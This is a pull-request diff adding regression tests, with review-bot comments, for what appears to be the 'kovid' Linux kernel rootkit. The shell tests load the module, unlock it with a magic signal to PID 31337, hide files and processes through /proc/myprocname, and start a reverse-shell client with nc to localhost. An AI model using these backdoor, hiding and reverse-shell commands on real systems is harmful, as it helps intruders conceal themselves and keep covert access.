Merge pull request #147 from carloslack/regression-tests-v2.1.1
Regression tests v2.1.1
Showing
14 changed files
with
179 additions
and
15 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
obj-m = hello.o | ||
|
||
all: | ||
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | ||
|
||
clean: | ||
make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean |
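Review bot: The `clean` recipe passes `--C` to make, which GNU make does not accept as its change-directory option, so `make clean` will most likely stop with an unrecognized-option error; it should use `-C` as the `all` recipe does. Both recipes would also be better written with `$(MAKE)` so that flags and the jobserver propagate into the kernel build, e.g. `$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean`.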
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
#include <linux/module.h> | ||
#include <linux/kernel.h> | ||
#include <linux/init.h> | ||
|
||
MODULE_LICENSE("GPL"); | ||
|
||
MODULE_DESCRIPTION("A simple Hello world LKM!"); | ||
|
||
MODULE_VERSION("0.1"); | ||
|
||
static int __init hello_start(void) | ||
{ | ||
printk(KERN_INFO "Loading hello module...\n"); | ||
printk(KERN_INFO "Hello world\n"); | ||
return 0; | ||
} | ||
|
||
static void __exit hello_end(void) | ||
{ | ||
printk(KERN_INFO "Goodbye!!!\n"); | ||
} | ||
|
||
module_init(hello_start); | ||
module_exit(hello_end); |
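Review bot: Nothing in this module says that the strings printed by `hello_start` are load-bearing: the dmesg regression test in this commit matches `Loading hello module...` and `Hello world` with its CHECK lines, so rewording either message silently breaks that test. A comment above `hello_start` would help, for example `/* Test fixture: the messages below are matched by FileCheck CHECK lines; keep them in sync. */`. As a style point, `pr_info("Hello world\n")` is the usual kernel spelling of `printk(KERN_INFO ...)`.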
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
int main() | ||
{ | ||
while(1); | ||
|
||
return 0; | ||
} |
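Review bot: `while(1);` keeps a core fully busy for as long as this fixture runs, and it is presumably the source of the `./Inputs/a.out` that the hide-task test starts in the background and then expects `kill -9` to fail on, so the spin can outlive the test. Blocking instead keeps the process alive at no CPU cost: include `<unistd.h>` and replace the loop with `for (;;) pause();`. The `return 0;` after the loop is unreachable, and `int main()` would be clearer as `int main(void)`.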
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
kill -CONT 31337 | ||
|
||
TEST_FILE="hidden_file.txt" | ||
|
||
# Create a file with the same name in another directory | ||
OTHER_DIR="/tmp/other_dir" | ||
mkdir -p "$OTHER_DIR" | ||
touch "$OTHER_DIR/$TEST_FILE" | ||
|
||
# Hide the file using the backdoor | ||
echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname | ||
|
||
# Check that files with the same name in other directories are also hidden | ||
ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" | ||
|
||
# Cleanup | ||
rm -rf "$OTHER_DIR" | ||
|
||
# Remove the kernel module | ||
sudo rmmod kovid | ||
|
||
# CHECK: File is hidden in other directory |
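Review bot: The `# Cleanup` step runs `rm -rf "$OTHER_DIR"` while the module is still loaded and the file is still hidden. If hiding works by filtering directory listings, which the `ls` check suggests, `rm` never sees the file, the final rmdir fails, and `/tmp/other_dir` is left behind for the next run. Moving the `rm -rf` after `sudo rmmod kovid` avoids that; the hide-file test later in this commit has the same ordering. A fixed name under `/tmp` is also shared by every user on the host, so `OTHER_DIR="$(mktemp -d)"` would be safer.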
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
kill -CONT 31337 | ||
|
||
# Create a test directory and file | ||
TEST_DIR="/tmp/test_hide_file" | ||
TEST_FILE="hidden_file.txt" | ||
mkdir -p "$TEST_DIR" | ||
touch "$TEST_DIR/$TEST_FILE" | ||
|
||
# Hide the file using the backdoor | ||
echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname | ||
|
||
# Verify that the file is hidden when listing the directory | ||
ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" | ||
|
||
# Cleanup | ||
rm -rf "$TEST_DIR" | ||
|
||
# Remove the kernel module | ||
sudo rmmod kovid | ||
|
||
# CHECK: File is hidden |
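Review bot: The only assertion, `ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"`, also prints the expected line when the file was never created or `ls` itself fails, so the test can pass without the module having hidden anything. A positive control before the `echo hide-file=...` write would close that gap, e.g. `ls "$TEST_DIR" | grep -qxF "$TEST_FILE" && echo "File is visible"` with a matching `# CHECK: File is visible` placed ahead of the existing CHECK line. The same applies to the hide-file-anywhere test earlier in this commit.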
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo insmod ../../../build/kovid.ko | ||
|
||
# Start the reverse shell in the background, suppressing its output | ||
sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 & | ||
|
||
# Allow the reverse shell to initialize | ||
sleep 1 | ||
|
||
# Send a signal to the "kill -CONT 31337" process as an additional check | ||
kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process" | ||
|
||
# Run the `a.out` executable in the background and capture its PID | ||
./Inputs/a.out & | ||
AOUT_PID=$! | ||
|
||
# Wait briefly to ensure the process has started | ||
sleep 1 | ||
|
||
# Hide the process using the backdoor functionality | ||
echo hide-task-backdoor=$AOUT_PID > /proc/myprocname | ||
|
||
# Attempt to kill the hidden process and verify that it fails | ||
kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process" | ||
|
||
# Remove the module | ||
sudo rmmod kovid | ||
|
||
# CHECK: sh: can't kill pid 31337: No such process | ||
# CHECK: sh: can't kill pid {{.*}}: No such process |
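Review bot: `./Inputs/a.out` is started in the background and never reaped: the test expects `kill -9 "$AOUT_PID"` to fail while the process is hidden, and nothing signals it again after `sudo rmmod kovid`, so each run appears to leave a process behind. Assuming the process becomes signalable again once the module is unloaded, add `kill -9 "$AOUT_PID" 2>/dev/null || true` after the `rmmod` line. Both CHECK lines also match text produced by the script's own `echo` fallbacks rather than the shell's real error output, so they only assert that `kill` returned non-zero.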
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
# REQUIRES: 0 | ||
# REQUIRES: DEBUG_ONLY | ||
# REQUIRES: NATIVE_TESTS | ||
|
||
## Make sure you enter `test/native/Inputs` and run `make` | ||
## in order to build `hello.ko`. | ||
|
||
# RUN: bash %s > %t.log | ||
# RUN: FileCheck-18 --input-file=%t.log %s | ||
|
||
sudo dmesg -c | ||
sleep 2 | ||
sudo insmod ../../../test/native/Inputs/hello.ko | ||
sudo rmmod hello | ||
sudo dmesg | ||
|
||
# CHECK: Loading hello module... | ||
# CHECK: Hello world |
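Review bot: `sudo dmesg -c` prints the existing ring buffer before clearing it, and that output lands in `%t.log`, so a `Loading hello module...` / `Hello world` pair left over from an earlier run satisfies both CHECK lines even if the `insmod` in this run fails. Use `sudo dmesg -C` (clear without printing) or redirect the first call, `sudo dmesg -c > /dev/null`, so that only messages logged after the clear are checked. A `# CHECK: Goodbye!!!` line would additionally cover the module's exit path.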